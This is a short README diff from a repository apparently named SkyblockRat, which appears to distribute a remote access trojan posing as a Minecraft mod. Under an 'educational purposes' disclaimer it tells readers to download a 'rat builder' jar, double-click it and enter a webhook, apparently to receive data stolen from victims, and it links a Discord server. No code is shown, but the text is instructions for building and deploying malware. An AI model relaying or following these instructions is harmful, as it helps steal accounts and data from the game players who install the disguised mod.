ifallious/SkyblockRat/README.md

 ## This is purely for educational purposes

 ## to turn this code into a .jar minecraft mod use the rat builder (newsilly-1.0.jar) in https://github.com/iLoveRat/SkyblockRat/releases/tag/ratbuilderlatest
+### just download and double click, then put your webhook into the box.

 ### https://discord.gg/aKEYP4cGSq